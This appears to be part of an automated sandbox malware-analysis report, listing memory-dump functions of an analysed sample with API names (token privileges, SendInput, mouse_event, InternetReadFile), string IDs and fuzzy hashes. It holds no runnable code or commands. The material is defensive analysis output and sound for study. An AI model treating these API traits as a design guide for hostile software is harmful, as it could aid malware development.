                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                            • String ID:
                                                                            • API String ID: 2278415577-0
                                                                            • Opcode ID: a83b9796d64fc49bad9750aa55e5c296d1b681acd3370ba4c74b676021a65ade
                                                                            • Instruction ID: 0b077bee7cc20a40c2fbb1c82931f0b82508acfe2c7c271b7fb19301a1dc60be
                                                                            • Opcode Fuzzy Hash: a83b9796d64fc49bad9750aa55e5c296d1b681acd3370ba4c74b676021a65ade
                                                                            • Instruction Fuzzy Hash: A921C272608A8185DB24EF36E440669BBA0FB88BD4F848435DF4D07718CF7CD566C754
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                            • Instruction ID: 6be8ac3e9df83de6b312717ccc669c82aceb0abb662a4a84f4f4b05c0104e9c6
                                                                            • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                            • Instruction Fuzzy Hash: 8D0180336247818FE7209F30D8557A977A0FB547AEF400929F64982A98DB7DC269CF80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .
                                                                            • API String ID: 0-248832578
                                                                            • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                            • Instruction ID: 8e491a43f9c739972fcbb781439e686ce1e6e47f59c9a422580c91a5dbe24f2b
                                                                            • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                            • Instruction Fuzzy Hash: 43313852B146D155EB30BE729804A76EA91FB50BE4F848631EE5E0BBC4DE3CD5628310
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF79786475C,?,?,00000000,00007FF7978647D9,?,?,?,?,?,00007FF7978B2210), ref: 00007FF79786BF3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem
                                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                                            • API String ID: 2086374402-595813830
                                                                            • Opcode ID: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                            • Instruction ID: 1afa62b2674fa41603de29d1ec1d883e02a36e6705d5a6bf5b8d8d023016a9bd
                                                                            • Opcode Fuzzy Hash: 572b71549e45f6bab70ab7a1e99299a405b58e83dcd9cf08a8343814aa6f0cc3
                                                                            • Instruction Fuzzy Hash: B9F03020A19E4791FE75BB71B8448B8AB10BF44BD4FD85031D90E06765EF3CD466C720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise_clrfp
                                                                            • String ID:
                                                                            • API String ID: 15204871-0
                                                                            • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                            • Instruction ID: 5cdd9b55ac8d9549c5e96d352f9a07395114c2453a071d68a71f0dc06d1ef37c
                                                                            • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                            • Instruction Fuzzy Hash: 63B15EB3604B85CBEB25DF39C445768BBA0F744B88F588921DA5E877A4CB39D4A2C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                            • Instruction ID: 540e2869d54e78f0a617f808138e3f25d4ac08eecaeb5e9caa301643cf82068f
                                                                            • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                            • Instruction Fuzzy Hash: A9114F72B0874186DB20EB26E484768BB60FB84BD4F548631DA6D07B95CF7CD4628750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 0610f22d45407fd0b47a7a649e0349a2c0dbbad51231877a54e137cb0a8b0597
                                                                            • Instruction ID: 554f1f42ca43134c799e90a3ab0e1771e365e06fc54508152be8a59fde56e055
                                                                            • Opcode Fuzzy Hash: 0610f22d45407fd0b47a7a649e0349a2c0dbbad51231877a54e137cb0a8b0597
                                                                            • Instruction Fuzzy Hash: F1F0A46161864241E7306B25F800A6AEBA5FFC97D4F904134EB9D43BA9DF3CC4168B14
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: a/p$am/pm
                                                                            • API String ID: 0-3206640213
                                                                            • Opcode ID: abba1fb59dd0d37a808e969f9d786e5f26a4ac26cb0ba132a4672942b94724d8
                                                                            • Instruction ID: 907c2514a22fa9681a207389394dc6ebad2d0fb0cb5822c3c67bfc38fa1adf81
                                                                            • Opcode Fuzzy Hash: abba1fb59dd0d37a808e969f9d786e5f26a4ac26cb0ba132a4672942b94724d8
                                                                            • Instruction Fuzzy Hash: 7CE1F822A08A4295E774AF3581449BDABA4FF017C0FD4C939EA5D476C4EF3DE962C320
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: 0$0x%p
                                                                            • API String ID: 3215553584-2479247192
                                                                            • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                            • Instruction ID: 3c604294fe7126f5cd1357bf8769f9448abd6b9e5d5c742ec8eed8e08cea4789
                                                                            • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                            • Instruction Fuzzy Hash: EA811722A1820346EAB4AA758048E7DAFE1FF407C4FD425B1DD09D7695CF2DE867DB20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: no error
                                                                            • API String ID: 0-1106124726
                                                                            • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                            • Instruction ID: 275bab05a3d74909e7e568afa6ae08564cc89f4062043eb109781db44e83d5d8
                                                                            • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                            • Instruction Fuzzy Hash: 1D12AD72A087918AE734DF75D440ABDBBB0FB08788B904139EE4E57B94DB38E961C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 101623796-0
                                                                            • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                            • Instruction ID: 05486ac9843d5fd4a846c3e6032cd64f03f3f061f20264512bdfd899a9fa7f0e
                                                                            • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                            • Instruction Fuzzy Hash: 02219521B08A8246FBB4EA32A010BADA750FB45BC4FC45131DA4C07B85DF3CD617C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InputSend
                                                                            • String ID:
                                                                            • API String ID: 3431551938-0
                                                                            • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                            • Instruction ID: 0ca1046cc81bc039cf3e15e93a380cec56a7a07a7ce15181d51fd8035fb8639a
                                                                            • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                            • Instruction Fuzzy Hash: 12F0B46691C5C0C6D3309F11E440B6ABBA0FB5879DF405115EBC947B54CB3EC11A8F14
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: 22580d01158ad9bfa3fe7041ad110d63b9247ba50e2670ae2e587d0f1c9f6309
                                                                            • Instruction ID: 7ef7b781ba2087bbb4188983db8ed609990db6b30a1f62ed680091d000f9316b
                                                                            • Opcode Fuzzy Hash: 22580d01158ad9bfa3fe7041ad110d63b9247ba50e2670ae2e587d0f1c9f6309
                                                                            • Instruction Fuzzy Hash: 33E01A75E0C04292F27C3A38592AF36DE51BB91380ED00135DB8986AD8CE5DA6279538
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: 0
                                                                            • API String ID: 3215553584-4108050209
                                                                            • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                            • Instruction ID: bad232b3b4390c73f78b60a4f246ba1d738c3f800a0f0f29c89ff1ae4eb4e783
                                                                            • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                            • Instruction Fuzzy Hash: 71813921A1820346EB74AA758088D7EAFA0EF41BC4FD415B1DD0D9B685CF2DE867DF60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: 0
                                                                            • API String ID: 3215553584-4108050209
                                                                            • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                            • Instruction ID: 83839ef91b88d5e419fe42a03596feaea0f369516d8a4eb0d9a44fcb5002bd36
                                                                            • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                            • Instruction Fuzzy Hash: D5715A11A0C28346FB78AA355044E7DEF94AF51BC4FD405B1DD08876D5DE2DE8A78F21
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                            • Instruction ID: 5f3edc2603692f61ec6027e4ff96807679257773a2a2560176f21fdcadf5f63c
                                                                            • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                            • Instruction Fuzzy Hash: 1B41D372714F4599EA14EF3AD8152A9B7A2F748FD4B99A032DE0D87754EE3CD852C300
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0548de623bfebbda207010826f21370552519ffdf2f114197dd6058c9a5ad6be
                                                                            • Instruction ID: 2ec42c1c27a348d98e0c385c12a2ad491bfecf082119449aee6b023515440aa2
                                                                            • Opcode Fuzzy Hash: 0548de623bfebbda207010826f21370552519ffdf2f114197dd6058c9a5ad6be
                                                                            • Instruction Fuzzy Hash: 8D52A232E0C6428AEA34EB35D05AA7DAB65EF05BC4F954535DA1E076C1CFBCE462C360
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::cancel_current_task
                                                                            • String ID:
                                                                            • API String ID: 118556049-0
                                                                            • Opcode ID: 9d465ec18e803e34d1bd0c6ca394c3de7e8a6968c16621e4032f4c5f472c5c82
                                                                            • Instruction ID: 418bffde2e065f50ca7f451760ae3a1cb1f3a2d4c515563e76d72ba925108a7d
                                                                            • Opcode Fuzzy Hash: 9d465ec18e803e34d1bd0c6ca394c3de7e8a6968c16621e4032f4c5f472c5c82
                                                                            • Instruction Fuzzy Hash: 5E52B472B0864185EB20EF79D0446BC7BA5EB44BD8F804235EE1E5BBD5EE38E466C350
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d6881597c576967ce42828278cf34ccdad6199525d835b60b86007221e50383
                                                                            • Instruction ID: e55882f16316bed1c7dbdd1e806af1cd500cea61c83ab21e5762833f6fecdb87
                                                                            • Opcode Fuzzy Hash: 4d6881597c576967ce42828278cf34ccdad6199525d835b60b86007221e50383
                                                                            • Instruction Fuzzy Hash: 44428E32B0864186EB20EB39D480ABDAFA5FB847D8F904135EE5D47B95DF39E462C710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                            • Instruction ID: 1c3d27ada2eedfe3704fc4dbda227bef550cdca09b2f3f7857891bf18310b645
                                                                            • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                            • Instruction Fuzzy Hash: 7F422821D29F5A95D673BB35A851D35AF28BF553C0F818333E80EB6A54FF2CA4638610
